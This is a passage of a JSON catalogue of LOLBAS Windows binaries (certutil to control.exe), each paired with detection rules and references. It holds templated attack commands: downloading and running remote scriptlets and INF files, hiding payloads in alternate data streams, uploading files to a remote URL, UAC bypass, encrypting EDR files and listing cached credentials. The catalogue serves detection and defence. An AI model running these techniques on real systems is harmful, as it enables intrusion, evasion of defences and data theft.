measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:change-exe:0","toolId":"lolbas:change-exe","toolName":"Change.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"change.exe user","description":"Once executed, `change.exe` will execute `chgusr.exe` in the same folder. Thus, if `change.exe` is copied to a folder and an arbitrary executable is renamed to `chgusr.exe`, `change.exe` will spawn it. Instead of `user`, it is also possible to use `port` or `logon` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"change.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"]},{"id":"lolbas:cipher-exe:0","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher /w:{PATH_ABSOLUTE:folder}","description":"Zero out a file","usecase":"Can be used to forensically erase a file.","mitre":["T1485"],"privilege":"user","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"]},{"id":"lolbas:cipher-exe:1","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher.exe /e {PATH_ABSOLUTE}","description":"Encrypt a file","usecase":"Can be used to impair defences by e.g. encrypting a critical EDR solution file.","mitre":["T1562"],"privilege":"admin","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"]},{"id":"lolbas:cmd-exe:0","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat","description":"Add content to an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmd-exe:1","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe - < {PATH}:payload.bat","description":"Execute payload.bat stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1059.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmd-exe:2","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"type {PATH_SMB} > {PATH_ABSOLUTE}","description":"Downloads a specified file from a WebDAV server to the target file.","usecase":"Download/copy a file from a WebDAV server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmd-exe:3","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"type {PATH_ABSOLUTE} > {PATH_SMB}","description":"Uploads a specified file to a WebDAV server.","usecase":"Upload a file to a WebDAV server","mitre":["T1048.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmdkey-exe:0","toolId":"lolbas:cmdkey-exe","toolName":"Cmdkey.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"cmdkey /list","description":"List cached credentials","usecase":"Get credential information from host","mitre":["T1078"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdkey.exe","C:\\Windows\\SysWOW64\\cmdkey.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml"}],"references":["https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey","https://lolbas-project.github.io/lolbas/Binaries/Cmdkey/"]},{"id":"lolbas:cmdl32-exe:0","toolId":"lolbas:cmdl32-exe","toolName":"cmdl32.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmdl32 /vpn /lan %cd%\\config","description":"Download a file from the web address specified in the configuration file. The downloaded file will be in %TMP% under the name VPNXXXX.tmp where \"X\" denotes a random number or letter.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmdl32.exe","C:\\Windows\\SysWOW64\\cmdl32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %TMP%\\config.log"},{"type":"IOC","value":"Useragent Microsoft(R) Connection Manager Vpn File Update"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/151","https://twitter.com/ElliotKillick/status/1455897435063074824","https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/","https://lolbas-project.github.io/lolbas/Binaries/cmdl32/"]},{"id":"lolbas:cmstp-exe:0","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /ni /s {PATH_ABSOLUTE:.inf}","description":"Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Download and run scriptlets from internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"]},{"id":"lolbas:cmstp-exe:1","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"cmstp.exe /ni /s {REMOTEURL:.inf}","description":"Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.","usecase":"Execute code hidden within an inf file. Execute code directly from Internet.","mitre":["T1218.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"]},{"id":"lolbas:cmstp-exe:2","toolId":"lolbas:cmstp-exe","toolName":"Cmstp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"cmstp.exe /nf","description":"cmstp.exe reads the `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll` registry value and passes its data directly to `LoadLibrary`. By modifying this registry key and setting it to an attack-controlled DLL, this will sideload the DLL via `cmstp.exe`.","usecase":"Proxy execution of a malicious DLL via registry modification.","mitre":["T1218.003"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\cmstp.exe","C:\\Windows\\SysWOW64\\cmstp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"IOC","value":"Execution of cmstp.exe without a VPN use case is suspicious"},{"type":"IOC","value":"DotNet CLR libraries loaded into cmstp.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - cmstp.exe.log"},{"type":"IOC","value":"Registry modification to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\CmstpExtensionDll"}],"references":["https://twitter.com/NickTyrer/status/958450014111633408","https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80","https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e","https://oddvar.moe/2017/08/15/research-on-cmstp-exe/","https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp","https://gist.github.com/ghosts621/ea8ad5b8a0904dd40b33f01f0e8285dc","https://lolbas-project.github.io/lolbas/Binaries/Cmstp/"]},{"id":"lolbas:colorcpl-exe:0","toolId":"lolbas:colorcpl-exe","toolName":"Colorcpl.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"colorcpl {PATH}","description":"Copies the referenced file to C:\\Windows\\System32\\spool\\drivers\\color\\.","usecase":"Copies file(s) to a subfolder of a generally trusted folder (c:\\Windows\\System32), which can be used to hide files or make them blend into the environment.","mitre":["T1036.005"],"privilege":"user","fullPath":["C:\\Windows\\System32\\colorcpl.exe","C:\\Windows\\SysWOW64\\colorcpl.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml"},{"type":"IOC","value":"colorcpl.exe writing files"}],"references":["https://twitter.com/eral4m/status/1480468728324231172","https://lolbas-project.github.io/lolbas/Binaries/Colorcpl/"]},{"id":"lolbas:computerdefaults-exe:0","toolId":"lolbas:computerdefaults-exe","toolName":"ComputerDefaults.exe","name":"UAC Bypass","source":"LOLBAS","platform":["Windows"],"capability":["UAC Bypass","Privilege Escalation"],"nativeCategory":["UAC Bypass"],"command":"ComputerDefaults.exe","description":"Upon execution, ComputerDefaults.exe checks two registry values at HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command; if these are set by an attacker, the set command will be executed as a high-integrity process without a UAC prompt being displayed to the user. See 'resources' for which registry keys/values to set.","usecase":"Execute a binary or script as a high-integrity process without a UAC prompt.","mitre":["T1548.002"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ComputerDefaults.exe","C:\\Windows\\SysWOW64\\ComputerDefaults.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Event ID 10"},{"type":"IOC","value":"A binary or script spawned as a child process of ComputerDefaults.exe"},{"type":"IOC","value":"Changes to HKEY_CURRENT_USER\\Software\\Classes\\ms-settings\\Shell\\open\\command"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml"}],"references":["https://gist.github.com/havoc3-3/812547525107bd138a1a839118a3a44b","https://lolbas-project.github.io/lolbas/Binaries/ComputerDefaults/"]},{"id":"lolbas:configsecuritypolicy-exe:0","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"ConfigSecurityPolicy.exe {PATH_ABSOLUTE} {REMOTEURL}","description":"Upload file, credentials or data exfiltration in general","usecase":"Upload file","mitre":["T1567"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"]},{"id":"lolbas:configsecuritypolicy-exe:1","toolId":"lolbas:configsecuritypolicy-exe","toolName":"ConfigSecurityPolicy.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ConfigSecurityPolicy.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe","C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml"},{"type":"IOC","value":"ConfigSecurityPolicy storing data into alternate data streams."},{"type":"IOC","value":"Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS."},{"type":"IOC","value":"Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe."},{"type":"IOC","value":"User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\""}],"references":["https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads","https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor","https://twitter.com/NtSetDefault/status/1302589153570365440?s=20","https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/"]},{"id":"lolbas:conhost-exe:0","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Use conhost.exe as a proxy binary to evade defensive counter-measures","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"]},{"id":"lolbas:conhost-exe:1","toolId":"lolbas:conhost-exe","toolName":"Conhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"conhost.exe --headless {CMD}","description":"Execute a command line with conhost.exe as parent process","usecase":"Specify --headless parameter to hide child process window (if applicable)","mitre":["T1202"],"privilege":"user","fullPath":["c:\\windows\\system32\\conhost.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"conhost.exe spawning unexpected processes"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml"}],"references":["https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/","https://twitter.com/Wietze/status/1511397781159751680","https://twitter.com/embee_research/status/1559410767564181504","https://twitter.com/ankit_anubhav/status/1561683123816972288","https://lolbas-project.github.io/lolbas/Binaries/Conhost/"]},{"id":"lolbas:control-exe:0","toolId":"lolbas:control-exe","toolName":"Control.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"control.exe {PATH_ABSOLUTE}:evil.dll","description":"Execute evil.dll which is stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence 